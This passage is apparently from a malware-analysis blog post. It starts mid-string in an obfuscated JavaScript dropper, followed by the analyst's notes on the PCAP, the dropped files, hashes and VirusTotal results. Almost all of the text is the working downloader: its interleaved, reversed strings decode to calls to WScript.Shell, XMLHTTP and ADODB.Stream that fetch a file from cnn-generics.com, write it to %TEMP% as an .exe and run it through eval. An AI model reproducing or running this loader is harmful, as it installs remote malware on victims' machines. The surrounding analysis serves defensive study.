-;-)-]-)-a-B-Y-M-(-b-Z- -+- -)-q-M-J-(-0-m-W-F- -+- -s-Q-C-L- -+- -9-c-Q-[-u-H-F-V-(-]-6-z-J-Q- -+- -l-T-X-[-k-C-X-A- -;-/-*- - -L- -*-/- -n-L-=-]-0-n-Y-H-L- -+- -7-m-V-[-k-C-X-A- -;-)-(-]-8-s-C-Y-[-k-C-X-A- -;-)-)-s-O-(-t-L-K-A- -+- -w-P-L- -+- -0-b-K-E- -+- -2-y-G-S-W-(-]-)-)-(-}-;-5-j-F-W-G-R- -n-r-u-t-e-r-{-)-(-j-D-D-J- -n-o-i-t-c-n-u-f-(- -+- -)-)-(-}-;-7-s-T-J-K- -n-r-u-t-e-r-{-)-(-s-F- -n-o-i-t-c-n-u-f-(- -+- -)-)-(-}-;-0-j-U-H-M-X- -n-r-u-t-e-r-{-)-(-s-C- -n-o-i-t-c-n-u-f-(-[-t-p-i-r-c-S-W-=-k-C-X-A- -r-a-v- -}- -;-e-u-n-i-t-n-o-c- -;-)-0-0-1-(-]-)-)-(-}-;-4-x-O-N- -n-r-u-t-e-r-{-)-(-5-o-S-W- -n-o-i-t-c-n-u-f-(-[-t-p-i-r-c-S-W- -{- -)-4- -<- -e-t-a-t-s-y-d-a-e-r-.-u-H-F-V-(- -f-i- -}- -;-)-(-]-2-k-P-T- -+- -8-r-A-[-u-H-F-V- -;-)-e-s-l-a-f- -,-]-]-s-I-K- -+- -4-p-T-K- -+- -b-K-O-T-H-[-7-r-U-I-U- -%- -+-+-9-e-U-H-J-D-[-7-r-U-I-U- -,-)-2-f-C-I-(-2-d-B-(-]-8-s-C-Y-[-u-H-F-V- -}- -;-)-0-0-0-1-(-]-4-x-O-N-[-t-p-i-r-c-S-W- -;-0-=-9-e-U-H-J-D- -{- -)-]-s-I-K- -+- -4-p-T-K- -+- -b-K-O-T-H-[-7-r-U-I-U- -=->- -9-e-U-H-J-D-(- -f-i- -{- -)-r-Y-I-N- -=-=-1-(- -f-i- -{- -y-r-t- -{- -o-d- -;-0-=-9-e-U-H-J-D- -r-a-v- -;-1-=-r-Y-I-N- -r-a-v- -;-}- -}- -;-e-u-n-i-t-n-o-c- -{- -)-e-(- -h-c-t-a-c- -}- -;-k-a-e-r-b- -;-)-]-e-S-T-G-T-[-6-t-U-(-]-5-j-F-W-G-R- -+- -7-s-T-J-K- -+- -)-0-j-U-H-M-X-(-w-H-H-M-[-t-p-i-r-c-S-W-=-u-H-F-V- -r-a-v- -{- -y-r-t- -{- -)-+-+-e-S-T-G-T- -;-]-)-s-I-K-(-8-x-D- -+- -)-)-(-}-;-4-p-T-K- -n-r-u-t-e-r-{-)-(-e-T-Q- -n-o-i-t-c-n-u-f-(- -+- -b-K-O-T-H-[-6-t-U- -<- -e-S-T-G-T- -;-5-1-3-6- --- -5-1-3-6-=-e-S-T-G-T- -r-a-v-(- -r-o-f- -;-]-)-)-(-}-;-s-S-B-A- -n-r-u-t-e-r-{-)-(-4-c-H-K-O- -n-o-i-t-c-n-u-f-(- -+- -5-v-Q-T-Z- -+- -5-s-B-Y-D- -+- -w-S-M- -+- -8-z-I- -,-)-)-(-}-;-r-B- -n-r-u-t-e-r-{-)-(-2-o-J-F- -n-o-i-t-c-n-u-f-(- -+- -w-Z-Z-D- -+- -5-f-D-A- -+- -)-g-Q-Y-P-(-b-W- -+- -4-n-D-L-X-J- -+- -)-)-(-}-;-q-R-N-T-G- -n-r-u-t-e-r-{-)-(-8-x-H-N-J- -n-o-i-t-c-n-u-f-(- -+- -o-Z-Y-L- -+- -)-)-(-}-;-5-a-E-K-F- -n-r-u-t-e-r-{-)-(-3-e-P-I-W- -n-o-i-t-c-n-u-f-(- -+- -b-R-A-B-[-=-6-t-U- -r-a-v- -;-e-V-D-F- -+- -)-l-S-L-(-4-b-O- -+- -u-A-V-=-9-h-V-B- -r-a-v- -;-)-)-(-}-;-3-v-J- -n-r-u-t-e-r-{-)-(-f-D-M-N- -n-o-i-t-c-n-u-f-(- -+- -)-n-P-U-H-(-h-D-Z-Y-N- -+- -v-F-B-N- -+- -2-a-B-=-u-A-V- -r-a-v- -;-)-p-H-K- -+- -2-q-M-(-s-g-n-i-r-t-S-t-n-e-m-n-o-r-i-v-n-E-d-n-a-p-x-E-.-y-M-O-E-=-2-a-B- -r-a-v- -;-)-)-m-J-Z-(-6-r-X- -+- -8-a-H-Z- -+- -)-c-F-(-9-f-V- -+- -)-q-H-M-J-(-7-h-C-J-X-(-]-5-j-F-W-G-R- -+- -)-)-(-}-;-7-s-T-J-K- -n-r-u-t-e-r-{-)-(-p-J-I-X- -n-o-i-t-c-n-u-f-(- -+- -0-j-U-H-M-X-[-t-p-i-r-c-S-W-=-y-M-O-E- -r-a-v- -;-]-7-a-T- -+- -m-O-+-c-N-Q-O-+-r-P-H-+-)-g-H-K-(-5-c-X-X-+-4-y-M-W-+-s-P-S-J-+-5-z-R-Y- -+- -0-b-R-B-Z-+-5-l-J-+-z-Q-V- -,-1-e-W- -+- -)-0-l-G-T-W-N-(-1-v-D-+-8-w-Y-N-V-Y- -+- -)-k-M-M-(-j-P-+-6-c-S-S- -+- -)-h-R-G-H-(-9-q-J-S-T-+-4-p-V-R- -+- -o-I-+-5-s-U-Z-S-+-o-J-E-U-W-+-)-)-(-}-;-9-j-V- -n-r-u-t-e-r-{-)-(-m-K-K-K- -n-o-i-t-c-n-u-f-(- -+- -5-h-A-F-+-3-d-O-X-X-+-)-z-Q-V-(-d-A-V- -,-5-x-F-C-+-)-2-g-Q-G-Q-(-3-j-A-D- -+- -6-s-M-N-W-+-)-8-w-R-Y-Q-(-5-g-E-P- -+- -3-y-X-H-B-+-)-8-n-W-A-(-r-C- -+- -2-v-U-+-)-)-(-}-;-e-T-N- -n-r-u-t-e-r-{-)-(-h-J-L- -n-o-i-t-c-n-u-f-(-+-)-)-(-}-;-h-H- -n-r-u-t-e-r-{-)-(-e-P-T- -n-o-i-t-c-n-u-f-(- -+- -)-)-(-}-;-r-G-M- -n-r-u-t-e-r-{-)-(-6-r-F- -n-o-i-t-c-n-u-f-(-+-3-o-T-Z-A- -+- -1-f-P-A-+-5-p-C-I-C- -+- -)-1-o-P-E-(-9-l-W-E-K-+-5-l-J-+-z-Q-V-[-=-7-r-U-I-U- -r-a-v- -;-"-7-3-4-"-=-6-x-N-N-U- -r-a-v- -;-2- -*- -1-=-4-q-C-Y-B- -r-a-v- -;-2-=-9-h-J-G-I-N- -r-a-v- -;-1-=-n-L- -r-a-v- -;-]-)-)-(-}-;-s-I-K- -n-r-u-t-e-r-{-)-(-r-F-D- -n-o-i-t-c-n-u-f-(- -+- -)-4-p-T-K-(-r-E-N-M-I- -+- -b-K-O-T-H-[-7-k-J-Q-G-=-a-C- -r-a-v- -;-)-l-X- -+- -)-e-Y-D-S-(-o-C-Y-U-X- -,-g-A- -+- -e-J-A-H-O- -+- -x-X-E-E-L- -+- -9-b-L-(-=-7-k-J-Q-G- -r-a-v- -;-]-s-I-K- -+- -4-p-T-K- -+- -b-K-O-T-H-[-7-c-W-X-N-L-=-6-o-V-Z- -r-a-v- -;-)-v-S-Y- -+- -q-I-W-A- -+- -n-R- -+- -)-)-(-}-;-t-O-C- -n-r-u-t-e-r-{-)-(-2-z-Z-S-Q- -n-o-i-t-c-n-u-f-(- -+- -4-c-N- -+- -)-)-(-}-;-n-K-J- -n-r-u-t-e-r-{-)-(-s-O-H- -n-o-i-t-c-n-u-f-(- -+- -z-K-E- -+- -3-n-W-U-K-(-=-7-c-W-X-N-L- -r-a-v- -;-]-)-)-(-}-;-s-I-K- -n-r-u-t-e-r-{-)-(-0-u-O-C-B- -n-o-i-t-c-n-u-f-(- -+- -4-p-T-K- -+- -)-)-(-}-;-b-K-O-T-H- -n-r-u-t-e-r-{-)-(-3-w-O-T-L- -n-o-i-t-c-n-u-f-(-[-j-U-M-=-d-W-R-O- -r-a-v- -;-)-o-P-J- -+- -9-k-Y-J- -+- -p-H-R-B-L- -+- -n-H- -+- -)-y-R-K-(-j-T-V- -+- -o-Q-R- -,-i-Q- -+- -)-)-(-}-;-o-F-C- -n-r-u-t-e-r-{-)-(-a-O- -n-o-i-t-c-n-u-f-(- -+- -0-s-C-H-(-=-j-U-M- -r-a-v- -;-"-2-1-1-"- -=- -0-s-C-H- -r-a-v- -;-"-3-1-3-"- -=- -o-F-C- -r-a-v- -;-"-2-"- -=- -i-Q- -r-a-v- -;-"-A-A-A-"- -=- -o-Q-R- -r-a-v- -;-"-A-A-A-"- -=- -y-R-K- -r-a-v- -;-"-I-A-A-A-"- -=- -n-H- -r-a-v- -;-"-A-A-A-A-"- -=- -p-H-R-B-L- -r-a-v- -;-"-A-A-"- -=- -9-k-Y-J- -r-a-v- -;-"-A-"- -=- -o-P-J- -r-a-v-;-}-;-g-Q-P- -n-r-u-t-e-r-{-)-g-Q-P-(-j-T-V- -n-o-i-t-c-n-u-f- -;-"-n-e-l-"- -=- -b-K-O-T-H- -r-a-v- -;-"-t-g-"- -=- -4-p-T-K- -r-a-v- -;-"-h-"- -=- -s-I-K- -r-a-v-;-}-;-8-p-X-N- -n-r-u-t-e-r-{-)-8-p-X-N-(-c-I-T-B-J- -n-o-i-t-c-n-u-f-;-}-;-b-E-O- -n-r-u-t-e-r-{-)-b-E-O-(-s-L-I-H-H- -n-o-i-t-c-n-u-f-;-}-;-j-C-T- -n-r-u-t-e-r-{-)-j-C-T-(-z-L-V-K-D- -n-o-i-t-c-n-u-f-;-}-;-5-x-P-W- -n-r-u-t-e-r-{-)-5-x-P-W-(-l-A- -n-o-i-t-c-n-u-f-;-}-;-1-h-Z-L-C-C- -n-r-u-t-e-r-{-)-1-h-Z-L-C-C-(-2-p-X-V- -n-o-i-t-c-n-u-f-;-}-;-0-p-B-Z- -n-r-u-t-e-r-{-)-0-p-B-Z-(-8-x-D- -n-o-i-t-c-n-u-f-;-}-;-u-K-G- -n-r-u-t-e-r-{-)-u-K-G-(-r-E-N-M-I- -n-o-i-t-c-n-u-f- -;-"-6-A-5-V-X-"- -=- -3-n-W-U-K- -r-a-v- -;-"-F-o-"- -=- -z-K-E- -r-a-v- -;-"-d-s-v-a-"- -=- -n-K-J- -r-a-v- -;-"-q-S-X-v-"- -=- -4-c-N- -r-a-v- -;-"-O-J-B-"- -=- -t-O-C- -r-a-v- -;-"-p-W-v-i-"- -=- -n-R- -r-a-v- -;-"-X-D-"- -=- -q-I-W-A- -r-a-v- -;-"-1-X-G-f-"- -=- -v-S-Y- -r-a-v- -;-"-e-l-"- -=- -0-e-T-H-D- -r-a-v- -;-"-t-g-n-"- -=- -3-h-J- -r-a-v- -;-"-h-"- -=- -4-l-N-F- -r-a-v- -;-"-f-s-a-"- -=- -9-b-L- -r-a-v- -;-"-f-d-s-a-"- -=- -x-X-E-E-L- -r-a-v- -;-"-s-a-"- -=- -e-J-A-H-O- -r-a-v- -;-"-d-f-"- -=- -g-A- -r-a-v- -;-"-b-2-7-s-y-"- -=- -e-Y-D-S- -r-a-v- -;-"-2-1-0-s-"- -=- -l-X- -r-a-v-;-}-;-7-a-K- -n-r-u-t-e-r-{-)-7-a-K-(-o-C-Y-U-X- -n-o-i-t-c-n-u-f- -;-"-g-n-e-l-"- -=- -l-L-A-U-K- -r-a-v- -;-"-h-t-"- -=- -q-M-Z- -r-a-v- -;-"-7-3-4-"- -=- -0-n-Q-H-K- -r-a-v- -;-"-t-h-"- -=- -z-Q-V- -r-a-v-;-}-;-3-f-Q-Q- -n-r-u-t-e-r-{-)-3-f-Q-Q-(-d-A-V- -n-o-i-t-c-n-u-f- -;-"-/-:-p-t-"- -=- -5-l-J- -r-a-v- -;-"-c-/-"- -=- -1-o-P-E- -r-a-v- -;-"-n-"- -=- -5-p-C-I-C- -r-a-v-;-}-;-n-X-I-K- -n-r-u-t-e-r-{-)-n-X-I-K-(-9-l-W-E-K- -n-o-i-t-c-n-u-f- -;-"---n-"- -=- -1-f-P-A- -r-a-v- -;-"-g-"- -=- -3-o-T-Z-A- -r-a-v- -;-"-e-n-e-"- -=- -r-G-M- -r-a-v- -;-"-i-r-"- -=- -h-H- -r-a-v- -;-"-s-c-"- -=- -e-T-N- -r-a-v- -;-"-c-.-"- -=- -2-v-U- -r-a-v- -;-"-o-"- -=- -8-n-W-A- -r-a-v-;-}-;-u-Z- -n-r-u-t-e-r-{-)-u-Z-(-r-C- -n-o-i-t-c-n-u-f- -;-"-6-/-m-"- -=- -3-y-X-H-B- -r-a-v- -;-"-k-o-"- -=- -8-w-R-Y-Q- -r-a-v-;-}-;-4-o-Q- -n-r-u-t-e-r-{-)-4-o-Q-(-5-g-E-P- -n-o-i-t-c-n-u-f- -;-"-d-i-"- -=- -6-s-M-N-W- -r-a-v- -;-"-u-"- -=- -2-g-Q-G-Q- -r-a-v-;-}-;-x-C-A- -n-r-u-t-e-r-{-)-x-C-A-(-3-j-A-D- -n-o-i-t-c-n-u-f- -;-"-v-"- -=- -5-x-F-C- -r-a-v- -;-"-t-h-"- -=- -j-M-B- -r-a-v- -;-"-:-p-t-"- -=- -3-d-O-X-X- -r-a-v- -;-"-/-/-"- -=- -5-h-A-F- -r-a-v- -;-"-d-"- -=- -9-j-V- -r-a-v- -;-"-r-e-"- -=- -o-J-E-U-W- -r-a-v- -;-"-a-m-"- -=- -5-s-U-Z-S- -r-a-v- -;-"-m-o-d-"- -=- -o-I- -r-a-v- -;-"-c-.-"- -=- -4-p-V-R- -r-a-v- -;-"-.-m-o-"- -=- -h-R-G-H- -r-a-v- -;-"-x-m-"- -=- -6-c-S-S- -r-a-v-;-}-;-4-y-G-S-G- -n-r-u-t-e-r-{-)-4-y-G-S-G-(-9-q-J-S-T- -n-o-i-t-c-n-u-f- -;-"-b-s-/-"- -=- -k-M-M- -r-a-v- -;-"-e-"- -=- -8-w-Y-N-V-Y- -r-a-v-;-}-;-l-F-L-G-B- -n-r-u-t-e-r-{-)-l-F-L-G-B-(-j-P- -n-o-i-t-c-n-u-f- -;-"-f-4-e-"- -=- -0-l-G-T-W-N- -r-a-v- -;-"-y-"- -=- -1-e-W- -r-a-v-;-}-;-6-g-P-C-V- -n-r-u-t-e-r-{-)-6-g-P-C-V-(-1-v-D- -n-o-i-t-c-n-u-f- -;-"-t-h-"- -=- -2-w-R- -r-a-v- -;-"-/-:-p-t-"- -=- -v-X- -r-a-v- -;-"-d-n-i-/-"- -=- -0-b-R-B-Z- -r-a-v- -;-"-i-"- -=- -5-z-R-Y- -r-a-v- -;-"-l-f-n-a-"- -=- -s-P-S-J- -r-a-v- -;-"-w-o-"- -=- -4-y-M-W- -r-a-v- -;-"-.-s-r-e-"- -=- -g-H-K- -r-a-v-;-}-;-1-y-S-I-Z- -n-r-u-t-e-r-{-)-1-y-S-I-Z-(-5-c-X-X- -n-o-i-t-c-n-u-f- -;-"-r-o-"- -=- -r-P-H- -r-a-v- -;-"-h-q-/-g-"- -=- -c-N-Q-O- -r-a-v- -;-"-1-g-"- -=- -m-O- -r-a-v- -;-"-i-"- -=- -7-a-T- -r-a-v- -;-"-t-a-e-r-C-"- -=- -0-j-U-H-M-X- -r-a-v- -;-"-j-b-O-e-"- -=- -7-s-T-J-K- -r-a-v- -;-"-t-c-e-"- -=- -5-j-F-W-G-R- -r-a-v-;-}-;-r-C-J-W-Z- -n-r-u-t-e-r-{-)-r-C-J-W-Z-(-w-H-H-M- -n-o-i-t-c-n-u-f- -;-"-c-S-W-"- -=- -q-H-M-J- -r-a-v- -;-"-t-p-i-r-"- -=- -c-F- -r-a-v- -;-"-l-e-h-S-.-"- -=- -8-a-H-Z- -r-a-v- -;-"-l-"- -=- -m-J-Z- -r-a-v-;-}-;-0-t-N- -n-r-u-t-e-r-{-)-0-t-N-(-6-r-X- -n-o-i-t-c-n-u-f-;-}-;-m-E-Y- -n-r-u-t-e-r-{-)-m-E-Y-(-9-f-V- -n-o-i-t-c-n-u-f-;-}-;-o-P-D- -n-r-u-t-e-r-{-)-o-P-D-(-7-h-C-J-X- -n-o-i-t-c-n-u-f- -;-"-M-E-T-%-"- -=- -2-q-M- -r-a-v- -;-"-/-%-P-"- -=- -p-H-K- -r-a-v- -;-"-U-p-k-U-C-"- -=- -v-F-B-N- -r-a-v- -;-"-Q-G-o-"- -=- -n-P-U-H- -r-a-v- -;-"-u-a-"- -=- -3-v-J- -r-a-v-;-}-;-7-f-K-A-Z- -n-r-u-t-e-r-{-)-7-f-K-A-Z-(-h-D-Z-Y-N- -n-o-i-t-c-n-u-f- -;-"-e-.-"- -=- -l-S-L- -r-a-v-;-}-;-z-E-M-A- -n-r-u-t-e-r-{-)-z-E-M-A-(-4-b-O- -n-o-i-t-c-n-u-f- -;-"-e-x-"- -=- -e-V-D-F- -r-a-v- -;-"-n-i-W-"- -=- -b-R-A-B- -r-a-v- -;-"-t-t-H-"- -=- -5-a-E-K-F- -r-a-v- -;-"-i-W-.-p-"- -=- -o-Z-Y-L- -r-a-v- -;-"-H-n-"- -=- -q-R-N-T-G- -r-a-v- -;-"-t-t-"- -=- -4-n-D-L-X-J- -r-a-v- -;-"-u-q-e-R-p-"- -=- -g-Q-Y-P- -r-a-v- -;-"-s-e-"- -=- -5-f-D-A- -r-a-v- -;-"-.-t-"- -=- -w-Z-Z-D- -r-a-v- -;-"-1-.-5-"- -=- -r-B- -r-a-v-;-}-;-h-L-M- -n-r-u-t-e-r-{-)-h-L-M-(-b-W- -n-o-i-t-c-n-u-f- -;-"-S-M-"- -=- -8-z-I- -r-a-v- -;-"-M-X-"- -=- -w-S-M- -r-a-v- -;-"-M-X-.-2-L-"- -=- -5-s-B-Y-D- -r-a-v- -;-"-T-H-L-"- -=- -5-v-Q-T-Z- -r-a-v- -;-"-P-T-"- -=- -s-S-B-A- -r-a-v- -;-"-g-n-e-l-"- -=- -r-W-N- -r-a-v- -;-"-h-t-"- -=- -1-o-C-A- -r-a-v- -;-"-a-e-r-C-"- -=- -9-h-O-J-H- -r-a-v- -;-"-O-e-t-"- -=- -o-C-U-S- -r-a-v- -;-"-e-j-b-"- -=- -0-r-B- -r-a-v- -;-"-t-c-"- -=- -4-v-L-S-R- -r-a-v- -;-"-t-g-n-e-l-"- -=- -3-e-N- -r-a-v- -;-"-h-"- -=- -3-l-A- -r-a-v- -;-"-p-e-e-l-S-"- -=- -4-x-O-N- -r-a-v- -;-"-n-e-p-o-"- -=- -8-s-C-Y- -r-a-v- -;-"-T-E-G-"- -=- -2-f-C-I- -r-a-v-;-}-;-a-K- -n-r-u-t-e-r-{-)-a-K-(-2-d-B- -n-o-i-t-c-n-u-f- -;-"-n-e-l-"- -=- -g-B- -r-a-v- -;-"-t-g-"- -=- -7-x-U-F- -r-a-v- -;-"-h-"- -=- -1-t-X-V-J- -r-a-v- -;-"-e-s-"- -=- -8-r-A- -r-a-v- -;-"-d-n-"- -=- -2-k-P-T- -r-a-v- -;-"-p-e-e-l-S-"- -=- -r-I-Z-B-D- -r-a-v- -;-"-e-r-C-"- -=- -8-g-Z- -r-a-v- -;-"-O-e-t-a-"- -=- -a-G-R-U- -r-a-v- -;-"-t-c-e-j-b-"- -=- -k-S-Q-W- -r-a-v- -;-"-D-A-"- -=- -2-y-G-S-W- -r-a-v- -;-"-.-B-D-O-"- -=- -0-b-K-E- -r-a-v- -;-"-t-S-"- -=- -w-P-L- -r-a-v- -;-"-m-a-e-r-"- -=- -s-O- -r-a-v-;-}-;-o-C-N-N-X- -n-r-u-t-e-r-{-)-o-C-N-N-X-(-2-a-S- -n-o-i-t-c-n-u-f-;-}-;-t-D-U-A-P- -n-r-u-t-e-r-{-)-t-D-U-A-P-(-t-L-K-A- -n-o-i-t-c-n-u-f- -;-"-p-o-"- -=- -8-o-C-I- -r-a-v- -;-"-n-e-"- -=- -9-d-I-W-X- -r-a-v- -;-"-p-y-t-"- -=- -7-m-V- -r-a-v- -;-"-e-"- -=- -0-n-Y-H-L- -r-a-v- -;-"-i-r-w-"- -=- -l-T-X- -r-a-v- -;-"-e-t-"- -=- -6-z-J-Q- -r-a-v- -;-"-p-s-e-R-"- -=- -9-c-Q- -r-a-v- -;-"-s-n-o-"- -=- -s-Q-C-L- -r-a-v- -;-"-d-o-B-e-"- -=- -q-M-J- -r-a-v- -;-"-y-"- -=- -a-B-Y-M- -r-a-v-;-}-;-p-W- -n-r-u-t-e-r-{-)-p-W-(-b-Z- -n-o-i-t-c-n-u-f-;-}-;-5-u-X-D- -n-r-u-t-e-r-{-)-5-u-X-D-(-0-m-W-F- -n-o-i-t-c-n-u-f- -;-"-s-o-p-"- -=- -3-q-Q- -r-a-v- -;-"-n-o-i-t-i-"- -=- -2-z-J-Q-H-A- -r-a-v-;-}-;-c-F-C- -n-r-u-t-e-r-{-)-c-F-C-(-c-A- -n-o-i-t-c-n-u-f- -;-"-a-S-"- -=- -6-n-O-W- -r-a-v- -;-"-o-T-e-v-"- -=- -0-g-B- -r-a-v- -;-"-e-l-i-F-"- -=- -o-E-D- -r-a-v-;-}-;-u-C-A-T-C- -n-r-u-t-e-r-{-)-u-C-A-T-C-(-b-B-V-H-J- -n-o-i-t-c-n-u-f- -;-"-e-s-o-l-c-"- -=- -t-L-C-H- -r-a-v- -;-"-e-l-"- -=- -a-T-R- -r-a-v- -;-"-t-g-n-"- -=- -i-Y- -r-a-v- -;-"-h-"- -=- -7-a-C-I- -r-a-v- -;-"-g-n-e-l-"- -=- -8-c-Y-S- -r-a-v- -;-"-h-t-"- -=- -4-n-O-Y-F- -r-a-v- -;-"-n-u-R-"- -=- -c-K- -r-a-v- -;-"-1- -"- -=- -p-O- -r-a-v- -;-"-3-2-"- -=- -1-n-O- -r-a-v- -;-"-p-e-e-l-S-"- -=- -6-s-A- -r-a-v- -;-"-e-l-"- -=- -0-d-X-V- -r-a-v- -;-"-g-n-"- -=- -m-S-G- -r-a-v- -;-"-h-t-"- -=- -9-w-C-C-F- -r-a-v- -;-"-n-e-l-"- -=- -7-b-A-K-A- -r-a-v- -;-"-t-g-"- -=- -5-k-U-Q-R- -r-a-v- -;-"-h-"- -=- -2-j-H-M- -r-a-v- -;-"-t-g-n-e-l-"- -=- -8-b-Y-E-L-Z- -r-a-v- -;-"-h-"- -=- -5-e-B-C-N- -r-a-v- -;-"-e-l-"- -=- -e-N-S-X- -r-a-v- -;-"-h-t-g-n-"- -=- -9-r-N-Z- -r-a-v- -;-"-p-s-"- -=- -t-Q-T- -r-a-v- -;-"-e-c-i-l-"- -=- -k-L-O- -r-a-v- -;-"-t-g-n-e-l-"- -=- -l-C- -r-a-v- -;-"-h-"- -=- -m-F-W-L- -r-a-v- -;-"-e-l-"- -=- -b-J- -r-a-v- -;-"-h-t-g-n-"- -=- -9-q-S-Z-V-F- -r-a-v- -;-"-t-g-n-e-l-"- -=- -4-j-Q-Y-D- -r-a-v- -;-"-h-"- -=- -0-b-C- -r-a-v- -;-"-t-a-e-r-C-"- -=- -g-V-I-O-F- -r-a-v- -;-"-O-e-"- -=- -p-B-A-N- -r-a-v- -;-"-e-j-b-"- -=- -9-t-N-Z- -r-a-v- -;-"-t-c-"- -=- -n-X-P- -r-a-v- -;-"-D-O-D-A-"- -=- -f-H-E-F- -r-a-v- -;-"-r-t-S-.-B-"- -=- -l-L-X- -r-a-v- -;-"-m-a-e-"- -=- -4-d-J-B-B- -r-a-v- -;-"-p-y-t-"- -=- -d-C-V- -r-a-v- -;-"-e-"- -=- -5-b-D-R-Y-F- -r-a-v- -;-"-r-a-h-C-"- -=- -v-S-G-Z- -r-a-v- -;-"-t-e-s-"- -=- -1-h-D-Y- -r-a-v- -;-"-n-e-p-o-"- -=- -6-n-P- -r-a-v- -;-"-a-o-L-"- -=- -h-X-Z- -r-a-v- -;-"-r-F-d-"- -=- -j-Q-F-A-X- -r-a-v- -;-"-F-m-o-"- -=- -o-F-O-L- -r-a-v- -;-"-e-l-i-"- -=- -3-c-H-X- -r-a-v- -;-"-T-d-a-e-R-"- -=- -1-x-H-J- -r-a-v- -;-"-t-x-e-"- -=- -0-d-F-A-A- -r-a-v- -;-"-l-c-"- -=- -9-m-S-Z-B- -r-a-v- -;-"-e-s-o-"- -=- -q-E-U- -r-a-v- -;-"-n-e-l-"- -=- -3-r-Z-R- -r-a-v- -;-"-h-t-g-"- -=- -9-i-C-S-D- -r-a-v- -;-"-a-h-c-"- -=- -3-k-L-K-W- -r-a-v- -;-"-e-d-o-C-r-"- -=- -8-c-C-U- -r-a-v- -;-"-t-A-"- -=- -i-U-U-V-Z- -r-a-v- -;-"-h-s-u-p-"- -=- -4-l-M-W-F- -r-a-v- -;-"-t-g-n-e-l-"- -=- -3-x-O- -r-a-v- -;-"-h-"- -=- -2-p-S-E- -r-a-v- -;-"-C-m-o-r-f-"- -=- -9-h-J-N-W- -r-a-v- -;-"-C-r-a-h-"- -=- -e-A-L- -r-a-v- -;-"-d-o-"- -=- -3-g-M- -r-a-v- -;-"-e-"- -=- -z-N-P- -r-a-v- -;-"-n-i-o-j-"- -=- -m-B-O-S-A- -r-a-v- -;-"-a-e-r-C-"- -=- -t-T-S-P- -r-a-v- -;-"-O-e-t-"- -=- -1-f-F-A- -r-a-v- -;-"-t-c-e-j-b-"- -=- -8-f-A-U-D-J- -r-a-v- -;-"-D-A-"- -=- -8-o-W-Y-P- -r-a-v- -;-"-D-O-"- -=- -w-H-P- -r-a-v- -;-"-S-.-B-"- -=- -6-x-H-B- -r-a-v- -;-"-m-a-e-r-t-"- -=- -2-p-X- -r-a-v- -;-"-y-t-"- -=- -c-S-Z-T-D- -r-a-v- -;-"-e-p-"- -=- -m-L-V-D- -r-a-v- -;-"-a-h-C-"- -=- -4-v-G-M- -r-a-v- -;-"-t-e-s-r-"- -=- -v-T- -r-a-v- -;-"-n-e-p-o-"- -=- -1-z-N-B-X- -r-a-v- -;-"-e-t-i-r-w-"- -=- -4-d-N-W-M- -r-a-v- -;-"-t-x-e-T-"- -=- -7-y-H-N-X- -r-a-v-;-}-;-1-a-D- -n-r-u-t-e-r-{-)-1-a-D-(-1-u-T-Q- -n-o-i-t-c-n-u-f- -;-"-a-S-"- -=- -5-c-Z- -r-a-v- -;-"-F-o-T-e-v-"- -=- -i-F-Y-L- -r-a-v- -;-"-e-l-i-"- -=- -0-p-H-K- -r-a-v- -;-"-e-s-o-l-c-"- -=- -6-i-Y-M- -r-a-v';
x = new Array(); for (i=0;i<aWF9rS.length;i++)if(i%2==0)x.push(aWF9rS["charAt"](i));
aWF9rS = x.join('');
aWF9rS = aWF9rS["s"+"pl"+"it"]('');
aWF9rS = aWF9rS["r"+"ever"+"se"]();
aWF9rS = aWF9rS["j"+"o"+"in"]('');
var zx=11;
if (zx == 11) eval(aWF9rS);
@*/
Opening this javascript file up in IE yields a blank screen. Looking at the PCAP there was one GET request made:
GET /6okiduv HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: cnn-generics.com HTTP/1.1 200 OK Date: Sun, 05 Jun 2016 08:50:56 GMT Server: Apache Last-Modified: Fri, 27 May 2016 15:14:34 GMT ETag: "2ec00df-27c04-533d45d408719" Accept-Ranges: bytes Content-Length: 162820 Keep-Alive: timeout=10, max=10 Connection: Keep-Alive Content-Type: text/plain
From here there were a couple of files dropped in the “C:\Users\%username%\AppData\Local\Temp” folder. It is at that time I believe that we see several DNS calls being made that do not resolve, and several attempts to reach some IP addresses that did not respond (thankfully I was able to catch that by watching the callouts from the process running in Process Explorer). The details of the files that were dropped are:
File name: CUkpUoGQau
File size: 159KB
MD5 hash: 06ad646797909385252e67738c186cbf
Virustotal link: http://www.virustotal.com/en/file/b86c0d5e5f097f15af6ca11398a83427334bd1aa73a50af9a961c7ccecfdc9fa/analysis/
Detection ratio: 0 / 57
First submission 2016-05-28 00:18:12 UTC
File name: CUkpUoGQau.exe
File size: 159KB
MD5 hash: 5d8d14052c4d8a8996c276c5eb1324e4
Virustotal link: http://www.virustotal.com/en/file/bb14c9c95599dfbc9034de57782fecd0d3a325f5d6df6df39d14a293d493bc4e/analysis/
Detection ratio: 39 / 57
First submission 2016-06-01 04:29:15 UTC
Below is the video from the infection for your viewing pleasure.
Looking through the Process Monitor logs I can see where the two files are created, and the registry keys that help in adding the malicious binary make the call outs to the other IP addresses, but nothing in which that gives this any persistence. Even rebooting the VM and watching it for a while and seeing what connections were being made yielded nothing. I assume that there was another stage that, if successful, would have made this persistent.